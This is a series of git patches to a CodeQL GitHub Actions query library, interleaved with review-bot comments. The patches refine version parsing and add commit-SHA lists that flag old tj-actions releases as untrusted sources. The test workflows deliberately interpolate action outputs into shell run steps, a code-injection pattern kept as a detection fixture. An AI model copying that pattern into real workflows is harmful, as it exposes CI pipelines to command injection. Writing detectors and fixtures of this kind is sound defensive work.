b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -791,6 +791,8 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); + int getMajorVersion() { result = this.getVersion().regexpReplaceAll("\\..*", "").toInt() } + /** Gets the argument expression for the given key. */ string getArgument(string key) { exists(ScalarValueImpl scalar | @@ -832,8 +834,10 @@ class UsesStepImpl extends StepImpl, UsesImpl { ).toLowerCase() } - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ + override string getVersion() { + result = u.getValue().regexpCapture(usesParser(), 3).regexpReplaceAll("^v", "") + } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" @@ -865,12 +869,12 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | n.lookup("uses") = name and if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(repoUsesParser(), 4) + then result = name.getValue().regexpCapture(repoUsesParser(), 4).regexpReplaceAll("^v", "") else none() ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b4cf1f70315..bfe85dbdbe6 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
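Review bot: Stripping the leading `v` inside both `getVersion()` overrides changes the value every caller sees, not just the new version comparison: the UnpinnedActionsTag expectations updated in this commit now report `with ref '2'` for a step written as `@v2`, and a branch ref that happens to start with `v` would lose its first letter too. Leaving `getVersion()` as the ref exactly as written and normalising only where a number is needed keeps alert text accurate: `int getMajorVersion() { result = this.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() }`. `getMajorVersion()` also has no QLDoc; a one-line comment should state that it has no result for commit SHAs and branch names, since callers such as `u.getMajorVersion() < 41` silently fail to hold in that case.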
@@ -284,7 +284,54 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/changed-files" and ( u.getArgument("safe_output") = "false" or - u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41 + u.getMajorVersion() < 41 or + u.getVersion() + .matches([ + "56284d8", "9454999", "1c93849", "da093c1", "25ef392", "18c8a4e", "4052680", + "bfc49f4", "af292f1", "56284d8", "fea790c", "95690f9", "408093d", "db153ba", + "8238a41", "4196030", "a21a533", "8e79ba7", "76c4d81", "6ee9cdc", "246636f", + "48566bb", "fea790c", "1aee362", "2f7246c", "0fc9663", "c860b5c", "2f8b802", + "b7f1b73", "1c26215", "17f3fec", "1aee362", "a0585ff", "87697c0", "85c8b82", + "a96679d", "920e7b9", "de0eba3", "3928317", "68b429d", "2a968ff", "1f20fb8", + "87e23c4", "54849de", "bb33761", "ec1e14c", "2106eb4", "e5efec4", "5817a9e", + "a0585ff", "54479c3", "e1754a4", "9bf0914", "c912451", "174a2a6", "fb20f4d", + "07e0177", "b137868", "1aae160", "5d2fcdb", "9ecc6e7", "8c9ee56", "5978e5a", + "17c3e9e", "3f7b5c9", "cf4fe87", "043929e", "4e2535f", "652648a", "9ad1a5b", + "c798a4e", "25eaddf", "abef388", "1c2673b", "53c377a", "54479c3", "039afcd", + "b2d17f5", "4a0aac0", "ce810b2", "7ecfc67", "b109d83", "79adacd", "6e426e6", + "5e2d64b", "e9b5807", "db5dd7c", "07f86bc", "3a3ec49", "ee13744", "cda2902", + "9328bab", "4e680e1", "bd376fb", "84ed30e", "74b06ca", "5ce975c", "04124ef", + "3ee6abf", "23e3c43", "5a331a4", "7433886", "d5414fd", "7f2aa19", "210cc83", + "db3ea27", "57d9664", "0953088", "0562b9f", "487675b", "9a6dabf", "7839ede", + "c2296c1", "ea251d4", "1d1287f", "392359f", "7f33882", "1d8a2f9", "0626c3f", + "a2b1e5d", "110b9ba", "039afcd", "ce4b8e3", "3b6c057", "4f64429", "3f1e44a", + "74dc2e8", "8356a01", "baaf598", "8a4cc4f", "8a7336f", "3996bc3", "ef0a290", + "3ebdc42", "94e6fba", "3dbb79f", "991e8b3", "72d3bb8", "72d3bb8", "5f89dc7", + "734bb16", "d2e030b", "6ba3c59", "d0e4477", "b91acef", "1263363", "7184077", + "cbfb0fd", 
"932dad3", "9f28968", "c4d29bf", "ce4b8e3", "aa52cfc", "aa52cfc", + "1d6e210", "8953e85", "8de562e", "7c640bd", "2706452", "1d6e210", "dd7c814", + "528984a", "75af1a4", "5184a75", "dd7c814", "402f382", "402f382", "f7a5640", + "df4daca", "602081b", "6e12407", "c5c9b6f", "c41b715", "60f4aab", "82edb42", + "18edda7", "bec82eb", "f7a5640", "28ac672", "602cf94", "5e56dca", "58ae566", + "7394701", "36e65a1", "bf6ddb7", "6c44eb8", "b2ee165", "34a865a", "fb1fe28", + "ae90a0b", "bc1dc8f", "3de1f9a", "0edfedf", "2054502", "944a8b8", "581eef0", + "e55f7fb", "07b38ce", "d262520", "a6d456f", "a59f800", "a2f1692", "72aab29", + "e35d0af", "081ee9c", "1f30bd2", "227e314", "ffd30e8", "f5a8de7", "0bc7d40", + "a53d74f", "9335416", "4daffba", "4b1f26a", "09441d3", "e44053b", "c0dba81", + "fd2e991", "2a8a501", "a8ea720", "88edda5", "be68c10", "b59431b", "68bd279", + "2c85495", "f276697", "00f80ef", "f56e736", "019a09d", "3b638a9", "b42f932", + "8dfe0ee", "aae164d", "09a8797", "b54a7ae", "902e607", "2b51570", "040111b", + "3b638a9", "1d34e69", "b86b537", "2a771ad", "75933dc", "2c0d12b", "7abdbc9", + "675ab58", "8c6f276", "d825b1f", "0bd70b7", "0fe67a1", "7bfa539", "d679de9", + "1e10ed4", "0754fda", "d290bdd", "15b1769", "2ecd06d", "5fe8e4d", "7c66aa2", + "2ecd06d", "e95bba8", "7852058", "81f32e2", "450eadf", "0e956bb", "300e935", + "fcb2ab8", "271bbd6", "e8ace01", "473984b", "032f37f", "3a35bdf", "c2216f6", + "0f16c26", "271468e", "fb063fc", "a05436f", "c061ef1", "489e2d5", "8d5a33c", + "fbfaba5", "1980f55", "a86b560", "f917cc3", "e18ccae", "e1d275d", "00f80ef", + "9c1a181", "5eaa2d8", "188487d", "3098891", "467d26c", "d9eb683", "09a8797", + "8e7cc77", "81ad4b8", "5e2a2f1", "1af9ab3", "55a857d", "62a9200", "b915d09", + "f0751de", "eef9423" + ] + "%") ) and this.asExpr() = u ) 
@@ -302,7 +349,7 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/verify-changed-files" and ( u.getArgument("safe_output") = "false" or - u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 17 + u.getMajorVersion() < 17 ) and this.asExpr() = u ) diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml index 85f59f6fa26..6d506e65a13 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml @@ -40,3 +40,21 @@ jobs: for file in ${{ steps.changed-files3.outputs.all_changed_files }}; do echo "$file was changed" done + + - name: Get changed files 4 + id: changed-files4 + uses: tj-actions/changed-files@0874344d6ebbaa00a27da73276ae7162fadcaf69 # v44.3.0 + - name: List all changed files 4 + run: | + for file in ${{ steps.changed-files4.outputs.all_changed_files }}; do + echo "$file was changed" + done + + - name: Get changed files 5 + id: changed-files5 + uses: tj-actions/changed-files@95690f9ece77c1740f4a55b7f1de9023ed6b1f87 # v39.2.3 + - name: List all changed files 5 + run: | + for file in ${{ steps.changed-files5.outputs.all_changed_files }}; do + echo "$file was changed" + done diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index e9738fa9458..9e479f9eaf4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
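Review bot: `TJActionsVerifyChangedFilesSource` is given only the `u.getMajorVersion() < 17` test, so a tj-actions/verify-changed-files step pinned by commit SHA has no major version and is treated as a source only when `safe_output` is `"false"`, whereas the preceding hunk adds an abbreviated-SHA list for tj-actions/changed-files. If SHA pins of the older verify-changed-files releases should be covered, the same kind of list is needed here; otherwise a QLDoc line such as `* SHA-pinned refs are matched only through safe_output.` would record the limitation. The changed-files list in the preceding hunk would be easier to audit as a named private predicate with a comment on where the SHAs came from, and it repeats entries (`56284d8`, `fea790c`, `1aee362`).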
@@ -8,6 +8,7 @@ edges | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | 
@@ -87,6 +88,8 @@ nodes | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | semmle.label | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | semmle.label | Uses Step: changed-files3 | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -247,6 +250,7 @@ subpaths #select | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 048b0446f5f..738270e3ccd 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -8,6 +8,7 @@ edges | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | 
@@ -87,6 +88,8 @@ nodes | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | semmle.label | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | semmle.label | Uses Step: changed-files3 | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 0ba7832e8e8..dbbfba0a557 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,17 +1,17 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| 
.github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 
'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | 
.github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not 
a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From d3bb6668f6fca4eb93a8f909bb1f49f5e7f5550d Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 09:44:48 +0200 Subject: [PATCH 0246/1267] Missing getMajorVersion predicate --- ql/lib/codeql/actions/Ast.qll | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bfbc990d671..6d80c67f7fd 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -372,6 +372,8 @@ abstract class Uses extends AstNode instanceof UsesImpl { string getVersion() { result = super.getVersion() } + int getMajorVersion() { result = super.getMajorVersion() } + string getArgument(string argName) { result = super.getArgument(argName) } Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } From c39e802c1729d0a9a41e00246686d9395d3bec07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 13:56:49 +0200 Subject: [PATCH 0247/1267] Fix sources for tj-actions/verify-changed-files --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index bfe85dbdbe6..9e4c258e39a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -349,7 +349,20 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/verify-changed-files" and ( u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 17 + u.getMajorVersion() < 17 or + u.getVersion() + .matches([ + "54e20d3", "a9b6fd3", "30aa174", "7f1b21c", "54e20d3", "0409e18", "7da22d0", + "7016858", "0409e18", "7517b83", "bad2f5d", "3b573ac", "7517b83", "f557547", + "9ed3155", "f557547", "a3391b5", "a3391b5", "1d7ee97", "c432297", "6e986df", + "fa6ea30", "6f40ee1", "1b13d25", "c09bcad", "fda469d", "bd1e271", "367ba21", + "9dea97e", "c154cc6", "527ff75", "e8756d5", "bcb4e76", "25267f5", "ea24bfd", + "f2a40ba", "197e121", "a8f1b11", "95c26dd", "97ba4cc", "68310bb", "720ba6a", + "cedd709", "d68d3d2", "2e1153b", "c3dd635", "81bd1de", "31a9c74", "e981d37", + "e7f801c", "e86d0b9", "ad255a4", "3a8aed1", "de910b5", "d31b2a1", "e61c6fc", + "380890d", "873cfd6", "b0c60c8", "7183183", "6555389", "9828a95", "8150cee", + "48ddf88" + ] + "%") ) and this.asExpr() = u ) From b965a55339d8f4ba98ac701c394a5573a90e94cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 15:04:48 +0200 Subject: [PATCH 0248/1267] Fix error in select Casting to CachingWritingStep in the select clause was shadowing all the Poisonable result --- ql/src/Security/CWE-349/CachePoisoning.ql | 19 +++++++++++-------- .../CWE-349/.github/workflows/test8.yml | 19 +++++++++++++++++++ 2 files changed, 30 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index e0d59a02ab4..bf18df4797d 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
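Review bot: The hash list added to the `u.getVersion().matches(...)` disjunct has no comment saying what the entries are or how they were collected, and five of them appear twice (`54e20d3`, `0409e18`, `7517b83`, `f557547`, `a3391b5`), so it is hard to audit or extend. Presumably these are abbreviated commit SHAs of releases older than v17, listed because `getMajorVersion()` yields nothing for a step pinned by commit. If that is confirmed, a comment such as `// abbreviated SHAs of tj-actions/verify-changed-files releases before v17, for steps pinned by commit` would record it. Moving the de-duplicated list into a named private predicate would also keep the characteristic predicate readable. The class body starts outside the hunk.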
